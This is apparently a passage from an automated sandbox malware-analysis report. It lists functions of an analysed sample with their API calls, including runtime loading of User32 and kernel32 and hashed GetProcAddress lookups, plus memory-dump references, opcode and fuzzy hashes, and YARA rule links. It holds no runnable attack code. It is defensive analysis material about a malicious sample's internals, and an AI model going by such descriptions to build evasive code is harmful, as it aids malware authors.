                                                          • Associated: 00000000.00000002.1662657072.000000006CF50000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663245604.000000006CFD4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663399300.000000006CFEE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663433730.000000006CFF0000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663463710.000000006CFF1000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663500199.000000006CFF3000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663567948.000000006CFFA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663567948.000000006CFFC000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663715558.000000006CFFE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_6cf50000_file.jbxd
                                                          Similarity
                                                          • API ID: Variant$Init$Clear$Copy
                                                          • String ID:
                                                          • API String ID: 3833040332-0
                                                          • Opcode ID: 56b193f0eb4008af6f22739ca6e76ed521f18a3d4944d6ba1afe9b86e0d50ff5
                                                          • Instruction ID: 2df072f8eb117e3a6dd180d78bbb9c887e3c90d8f7f4c44d756c0c02f700618a
                                                          • Opcode Fuzzy Hash: 56b193f0eb4008af6f22739ca6e76ed521f18a3d4944d6ba1afe9b86e0d50ff5
                                                          • Instruction Fuzzy Hash: C2818CB1901219AFDB14DFA8D884FEEBBB9BF49304F14415DE505A7740DB35E909CBA0
                                                          Function 6CF7D880 Relevance: 18.2, APIs: 12, Instructions: 202COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • VariantInit.OLEAUT32(?), ref: 6CF7D8EC
                                                          • VariantInit.OLEAUT32 ref: 6CF7D902
                                                          • VariantInit.OLEAUT32(?), ref: 6CF7D90D
                                                          • SafeArrayCreateVector.OLEAUT32(0000000C,00000000,00000002), ref: 6CF7D929
                                                          • SafeArrayPutElement.OLEAUT32(?,?,?), ref: 6CF7D966
                                                          • VariantClear.OLEAUT32(?), ref: 6CF7D973
                                                          • SafeArrayPutElement.OLEAUT32(?,?,?), ref: 6CF7D9B4
                                                          • VariantClear.OLEAUT32(?), ref: 6CF7D9C1
                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6CF7DA6F
                                                          • VariantClear.OLEAUT32(?), ref: 6CF7DA80
                                                          • VariantClear.OLEAUT32(?), ref: 6CF7DA87
                                                          • VariantClear.OLEAUT32(?), ref: 6CF7DA99
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1662765517.000000006CF51000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CF50000, based on PE: true
                                                          • Associated: 00000000.00000002.1662657072.000000006CF50000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663245604.000000006CFD4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663399300.000000006CFEE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663433730.000000006CFF0000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663463710.000000006CFF1000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663500199.000000006CFF3000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663567948.000000006CFFA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663567948.000000006CFFC000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663715558.000000006CFFE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_6cf50000_file.jbxd
                                                          Similarity
                                                          • API ID: Variant$Clear$ArraySafe$Init$Element$CreateDestroyVector
                                                          • String ID:
                                                          • API String ID: 1625659656-0
                                                          • Opcode ID: cecb4adc6c7306891e26f04414d0616b0349aff383f04841e0b81ed88223a5a3
                                                          • Instruction ID: 28d2e6ed54be2ca3611cf178b20f83a117dc79f1da6c0e6d352dd49df49a7905
                                                          • Opcode Fuzzy Hash: cecb4adc6c7306891e26f04414d0616b0349aff383f04841e0b81ed88223a5a3
                                                          • Instruction Fuzzy Hash: 2F8156726083019FD714CF64C884B5ABBF5FF89714F148A5EE99897350E734E905CBA2
                                                          Function 6CF612A0 Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 171COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1662765517.000000006CF51000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CF50000, based on PE: true
                                                          • Associated: 00000000.00000002.1662657072.000000006CF50000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663245604.000000006CFD4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663399300.000000006CFEE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663433730.000000006CFF0000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663463710.000000006CFF1000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663500199.000000006CFF3000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663567948.000000006CFFA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663567948.000000006CFFC000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663715558.000000006CFFE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_6cf50000_file.jbxd
                                                          Similarity
                                                          • API ID: Xinvalid_argumentstd::_$_memmove
                                                          • String ID: invalid string position$string too long
                                                          • API String ID: 2168136238-4289949731
                                                          • Opcode ID: 15c9b62e045bb6cf8ae9e36b2ede66dac73dd2e17302ab68ee121c826e3f2f98
                                                          • Instruction ID: d896f9b412999d13fb86c402f34258ea6c02eeb3ad1c0669b793747f2a143aa6
                                                          • Opcode Fuzzy Hash: 15c9b62e045bb6cf8ae9e36b2ede66dac73dd2e17302ab68ee121c826e3f2f98
                                                          • Instruction Fuzzy Hash: 9F4182323042449BD714CE6EDC91A9EB3B6EB813557348A2EE492CBF41DB71E845C7A1
                                                          Function 6CF74BA0 Relevance: 15.5, APIs: 10, Instructions: 475COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • VariantInit.OLEAUT32(?), ref: 6CF74BDC
                                                          • VariantInit.OLEAUT32(?), ref: 6CF74BE5
                                                          • VariantInit.OLEAUT32(?), ref: 6CF74BEB
                                                          • SafeArrayCreateVector.OLEAUT32(0000000C,00000000,00000001), ref: 6CF74BF6
                                                          • SafeArrayPutElement.OLEAUT32(00000000,?,?), ref: 6CF74C2A
                                                          • VariantClear.OLEAUT32(?), ref: 6CF74C37
                                                          • SafeArrayDestroy.OLEAUT32(00000000), ref: 6CF75107
                                                          • VariantClear.OLEAUT32(?), ref: 6CF75117
                                                          • VariantClear.OLEAUT32(?), ref: 6CF7511D
                                                          • VariantClear.OLEAUT32(?), ref: 6CF75123
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1662765517.000000006CF51000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CF50000, based on PE: true
                                                          • Associated: 00000000.00000002.1662657072.000000006CF50000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663245604.000000006CFD4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663399300.000000006CFEE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663433730.000000006CFF0000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663463710.000000006CFF1000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663500199.000000006CFF3000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663567948.000000006CFFA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663567948.000000006CFFC000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663715558.000000006CFFE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_6cf50000_file.jbxd
                                                          Similarity
                                                          • API ID: Variant$Clear$ArrayInitSafe$CreateDestroyElementVector
                                                          • String ID:
                                                          • API String ID: 2515392200-0
                                                          • Opcode ID: 442c54de21148aa3aefd089c738b41a9159d50033aeb9e27871ed6bc26e1861d
                                                          • Instruction ID: 317531211e1f018617ac8f7dfcff1cf02e19b68f6bf6b0b1b1d182eb9023e155
                                                          • Opcode Fuzzy Hash: 442c54de21148aa3aefd089c738b41a9159d50033aeb9e27871ed6bc26e1861d
                                                          • Instruction Fuzzy Hash: 22120775A15705AFC758DBA8DD84DAAB3B9BF8C300F14466CF50AABB91CA30F841CB50
                                                          Function 6CF749B0 Relevance: 15.2, APIs: 10, Instructions: 174COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • VariantInit.OLEAUT32(6CFD05A8), ref: 6CF749EE
                                                          • VariantInit.OLEAUT32(?), ref: 6CF749F7
                                                          • VariantInit.OLEAUT32(?), ref: 6CF749FD
                                                          • SafeArrayCreateVector.OLEAUT32(0000000C,00000000,00000001), ref: 6CF74A08
                                                          • SafeArrayPutElement.OLEAUT32(00000000,?,?), ref: 6CF74A39
                                                          • VariantClear.OLEAUT32(?), ref: 6CF74A45
                                                          • SafeArrayDestroy.OLEAUT32(00000000), ref: 6CF74B66
                                                          • VariantClear.OLEAUT32(?), ref: 6CF74B76
                                                          • VariantClear.OLEAUT32(?), ref: 6CF74B7C
                                                          • VariantClear.OLEAUT32(6CFD05A8), ref: 6CF74B82
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1662765517.000000006CF51000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CF50000, based on PE: true
                                                          • Associated: 00000000.00000002.1662657072.000000006CF50000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663245604.000000006CFD4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663399300.000000006CFEE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663433730.000000006CFF0000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663463710.000000006CFF1000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663500199.000000006CFF3000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663567948.000000006CFFA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663567948.000000006CFFC000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663715558.000000006CFFE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_6cf50000_file.jbxd
                                                          Similarity
                                                          • API ID: Variant$Clear$ArrayInitSafe$CreateDestroyElementVector
                                                          • String ID:
                                                          • API String ID: 2515392200-0
                                                          • Opcode ID: 1c5f13d0582e2143136ec211f2959a42d3783dcfbaba49f29d95b3d2f4a7fdc0
                                                          • Instruction ID: e4ca5f019add66c2217f233a4c4d63bd7b070501d3890cae3f53c65be3632b6f
                                                          • Opcode Fuzzy Hash: 1c5f13d0582e2143136ec211f2959a42d3783dcfbaba49f29d95b3d2f4a7fdc0
                                                          • Instruction Fuzzy Hash: 69517F72A002199FDB14DFA4DC84FAEBBB8FF89314F14416AE915EB745D734A901CBA0
                                                          Function 6CF747D0 Relevance: 15.2, APIs: 10, Instructions: 168COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • VariantInit.OLEAUT32(?), ref: 6CF7480C
                                                          • VariantInit.OLEAUT32(?), ref: 6CF74815
                                                          • VariantInit.OLEAUT32(?), ref: 6CF7481B
                                                          • SafeArrayCreateVector.OLEAUT32(0000000C,00000000,00000001), ref: 6CF74826
                                                          • SafeArrayPutElement.OLEAUT32(00000000,000000FF,?), ref: 6CF7485B
                                                          • VariantClear.OLEAUT32(?), ref: 6CF74868
                                                          • SafeArrayDestroy.OLEAUT32(00000000), ref: 6CF74974
                                                          • VariantClear.OLEAUT32(?), ref: 6CF74984
                                                          • VariantClear.OLEAUT32(?), ref: 6CF7498A
                                                          • VariantClear.OLEAUT32(?), ref: 6CF74990
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1662765517.000000006CF51000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CF50000, based on PE: true
                                                          • Associated: 00000000.00000002.1662657072.000000006CF50000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663245604.000000006CFD4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663399300.000000006CFEE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663433730.000000006CFF0000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663463710.000000006CFF1000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663500199.000000006CFF3000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663567948.000000006CFFA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663567948.000000006CFFC000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663715558.000000006CFFE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_6cf50000_file.jbxd
                                                          Similarity
                                                          • API ID: Variant$Clear$ArrayInitSafe$CreateDestroyElementVector
                                                          • String ID:
                                                          • API String ID: 2515392200-0
                                                          • Opcode ID: 422424ad08b6692e0ef6dc7e6d3521859ce084a2c982004b2c1dc5c379889dd9
                                                          • Instruction ID: 776d95873e3f7e9ab814ef5cc712435c0647d431a93e038de9ec81834e8ee9fb
                                                          • Opcode Fuzzy Hash: 422424ad08b6692e0ef6dc7e6d3521859ce084a2c982004b2c1dc5c379889dd9
                                                          • Instruction Fuzzy Hash: 14515C72A002499FDB14DFA4DC84EAEBBB9FF89314F14456EE505EB640D730A905CFA0
                                                          Function 6CF6DCD0 Relevance: 15.1, APIs: 10, Instructions: 138COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • VariantInit.OLEAUT32(?), ref: 6CF6DD00
                                                          • SafeArrayCreateVector.OLEAUT32(0000000C,00000000,00000003), ref: 6CF6DD10
                                                          • SafeArrayPutElement.OLEAUT32(00000000,6CF72FFF,?), ref: 6CF6DD47
                                                          • VariantClear.OLEAUT32(?), ref: 6CF6DD4F
                                                          • SafeArrayPutElement.OLEAUT32(00000000,6CF72FFF,?), ref: 6CF6DD6D
                                                          • SafeArrayPutElement.OLEAUT32(00000000,00000002,?), ref: 6CF6DDA4
                                                          • VariantClear.OLEAUT32(?), ref: 6CF6DDAC
                                                          • SafeArrayDestroy.OLEAUT32(00000000), ref: 6CF6DE16
                                                          • SafeArrayDestroy.OLEAUT32(00000000), ref: 6CF6DE27
                                                          • VariantClear.OLEAUT32(?), ref: 6CF6DE31
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1662765517.000000006CF51000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CF50000, based on PE: true
                                                          • Associated: 00000000.00000002.1662657072.000000006CF50000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663245604.000000006CFD4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663399300.000000006CFEE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663433730.000000006CFF0000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663463710.000000006CFF1000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663500199.000000006CFF3000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663567948.000000006CFFA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663567948.000000006CFFC000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663715558.000000006CFFE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_6cf50000_file.jbxd
                                                          Similarity
                                                          • API ID: ArraySafe$Variant$ClearElement$Destroy$CreateInitVector
                                                          • String ID:
                                                          • API String ID: 3525949229-0
                                                          • Opcode ID: ce847a7c41be1610cae81d76c5865ab391a7332eddf9d2a277b569db4d9cf479
                                                          • Instruction ID: 7e9660800cb9878704bf1695f30f7f8aa80d7b577d5960c7fd4a9c52a9276cdb
                                                          • Opcode Fuzzy Hash: ce847a7c41be1610cae81d76c5865ab391a7332eddf9d2a277b569db4d9cf479
                                                          • Instruction Fuzzy Hash: 4A513A75A01609AFDB01DFA5C888FDEBBB8EF99700F118119EA15A7750DB34A901CBA0
                                                          Function 6CF8C1B0 Relevance: 14.3, APIs: 1, Strings: 7, Instructions: 266COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • std::_Xinvalid_argument.LIBCPMT ref: 6CF8C213
                                                            • Part of subcall function 6CFB90D8: std::exception::exception.LIBCMT ref: 6CFB90ED
                                                            • Part of subcall function 6CFB90D8: __CxxThrowException@8.LIBCMT ref: 6CFB9102
                                                            • Part of subcall function 6CFB90D8: std::exception::exception.LIBCMT ref: 6CFB9113
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1662765517.000000006CF51000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CF50000, based on PE: true
                                                          • Associated: 00000000.00000002.1662657072.000000006CF50000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663245604.000000006CFD4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663399300.000000006CFEE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663433730.000000006CFF0000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663463710.000000006CFF1000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663500199.000000006CFF3000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663567948.000000006CFFA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663567948.000000006CFFC000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663715558.000000006CFFE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_6cf50000_file.jbxd
                                                          Similarity
                                                          • API ID: std::exception::exception$Exception@8ThrowXinvalid_argumentstd::_
                                                          • String ID: gfff$gfff$gfff$gfff$gfff$gfff$vector<T> too long
                                                          • API String ID: 1823113695-1254974138
                                                          • Opcode ID: 18209dc1d1108b634390b0d7a9bd59f02f00216fecff4ef1733910bd2c580461
                                                          • Instruction ID: 5ac48ee927483725bc9719bb098d100fed7cd8fa6c22906f89dda4088cec9cba
                                                          • Opcode Fuzzy Hash: 18209dc1d1108b634390b0d7a9bd59f02f00216fecff4ef1733910bd2c580461
                                                          • Instruction Fuzzy Hash: 0C9177B1A00609AFCB18CF99DC80EEEB7B9EB88314F14861DE955DB740D730BA04CB91
                                                          Function 6CF60CD0 Relevance: 14.2, APIs: 6, Strings: 2, Instructions: 196COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1662765517.000000006CF51000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CF50000, based on PE: true
                                                          • Associated: 00000000.00000002.1662657072.000000006CF50000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663245604.000000006CFD4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663399300.000000006CFEE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663433730.000000006CFF0000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663463710.000000006CFF1000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663500199.000000006CFF3000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663567948.000000006CFFA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663567948.000000006CFFC000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663715558.000000006CFFE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_6cf50000_file.jbxd
                                                          Similarity
                                                          • API ID: Xinvalid_argumentstd::_$_memmove
                                                          • String ID: invalid string position$string too long
                                                          • API String ID: 2168136238-4289949731
                                                          • Opcode ID: ec9a7859a959d342564b8367dd2ca8d0c69e0731646f69e277d762a52e6770ca
                                                          • Instruction ID: 002991e8501e7ca26ab3ccd8d09238cd48ad5a6d688326fd3c60cbecfe7b09c8
                                                          • Opcode Fuzzy Hash: ec9a7859a959d342564b8367dd2ca8d0c69e0731646f69e277d762a52e6770ca
                                                          • Instruction Fuzzy Hash: 7251D3327001559BD724CE1ED980A9FB3E6EBD5314B348A2EE855C7F84DBB0EC408795
                                                          Function 6CF81B20 Relevance: 14.2, APIs: 6, Strings: 2, Instructions: 154libraryloaderCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetModuleHandleW.KERNEL32(User32.dll,?,00000000,?,?,?,?,?,?,?,?), ref: 6CF81C5E
                                                          • LoadLibraryW.KERNEL32(User32.dll,?,00000000,?,?,?,?,?,?,?,?), ref: 6CF81C69
                                                          • GetProcAddress.KERNEL32(00000000,F1F2E532), ref: 6CF81CA2
                                                          • GetModuleHandleW.KERNEL32(kernel32.dll,?,00000000), ref: 6CF81CC1
                                                          • LoadLibraryW.KERNEL32(kernel32.dll,?,00000000), ref: 6CF81CCC
                                                          • GetProcAddress.KERNEL32(00000000,EFF3E52B), ref: 6CF81D0A
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1662765517.000000006CF51000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CF50000, based on PE: true
                                                          • Associated: 00000000.00000002.1662657072.000000006CF50000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663245604.000000006CFD4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663399300.000000006CFEE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663433730.000000006CFF0000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663463710.000000006CFF1000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663500199.000000006CFF3000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663567948.000000006CFFA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663567948.000000006CFFC000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663715558.000000006CFFE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_6cf50000_file.jbxd
                                                          Similarity
                                                          • API ID: AddressHandleLibraryLoadModuleProc
                                                          • String ID: User32.dll$kernel32.dll
                                                          • API String ID: 310444273-1965990335
                                                          • Opcode ID: cbad8374a5e7f033a9b79b70c50f3a44573d19f9c523468baa54ace1b73a440b
                                                          • Instruction ID: 0574154403c1d264909ebc6c3f666fac741ffccb7795f69edef86481748929c4
                                                          • Opcode Fuzzy Hash: cbad8374a5e7f033a9b79b70c50f3a44573d19f9c523468baa54ace1b73a440b
                                                          • Instruction Fuzzy Hash: 6B6138B5601A009FD760CF19C581B6BBBF2FB46700F64CA58D4A69BE52D736F846CB80
                                                          Function 6CFC4409 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 77COMMONLIBRARYCODE
                                                          Download Yara Rule
                                                          APIs
                                                          • UnDecorator::getArgumentList.LIBCMT ref: 6CFC442E
                                                            • Part of subcall function 6CFC3FC9: Replicator::operator[].LIBCMT ref: 6CFC404C
                                                            • Part of subcall function 6CFC3FC9: DName::operator+=.LIBCMT ref: 6CFC4054
                                                          • DName::operator+.LIBCMT ref: 6CFC4487
                                                          • DName::DName.LIBCMT ref: 6CFC44DF
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1662765517.000000006CF51000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CF50000, based on PE: true
                                                          • Associated: 00000000.00000002.1662657072.000000006CF50000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663245604.000000006CFD4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663399300.000000006CFEE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663433730.000000006CFF0000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663463710.000000006CFF1000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663500199.000000006CFF3000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663567948.000000006CFFA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663567948.000000006CFFC000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663715558.000000006CFFE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_6cf50000_file.jbxd
                                                          Similarity
                                                          • API ID: ArgumentDecorator::getListNameName::Name::operator+Name::operator+=Replicator::operator[]
                                                          • String ID: ,...$,<ellipsis>$...$<ellipsis>$void
                                                          • API String ID: 834187326-2211150622
                                                          • Opcode ID: 367b155fd97d81c4ad4e72b24c59aefa18fbe48fd9e498811dd66f5959260974
                                                          • Instruction ID: ac98bc382e7b13e90b46960ace0eb170bb08fc2ba7321b1a6aebea6386b18e4e
                                                          • Opcode Fuzzy Hash: 367b155fd97d81c4ad4e72b24c59aefa18fbe48fd9e498811dd66f5959260974
                                                          • Instruction Fuzzy Hash: 0221D0B0704109AFCB51DF58E040AAE3FF8EB46789B258181EC59CBB12CB34E903CB51
                                                          Function 6CFC5D36 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 55COMMONLIBRARYCODE
                                                          Download Yara Rule
                                                          APIs
                                                          • UnDecorator::UScore.LIBCMT ref: 6CFC5D40
                                                          • DName::DName.LIBCMT ref: 6CFC5D4C
                                                            • Part of subcall function 6CFC3B3B: DName::doPchar.LIBCMT ref: 6CFC3B6C
                                                          • UnDecorator::getScopedName.LIBCMT ref: 6CFC5D8B
                                                          • DName::operator+=.LIBCMT ref: 6CFC5D95
                                                          • DName::operator+=.LIBCMT ref: 6CFC5DA4
                                                          • DName::operator+=.LIBCMT ref: 6CFC5DB0
                                                          • DName::operator+=.LIBCMT ref: 6CFC5DBD
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1662765517.000000006CF51000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CF50000, based on PE: true
                                                          • Associated: 00000000.00000002.1662657072.000000006CF50000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663245604.000000006CFD4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663399300.000000006CFEE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663433730.000000006CFF0000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663463710.000000006CFF1000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663500199.000000006CFF3000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663567948.000000006CFFA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663567948.000000006CFFC000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663715558.000000006CFFE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_6cf50000_file.jbxd
                                                          Similarity
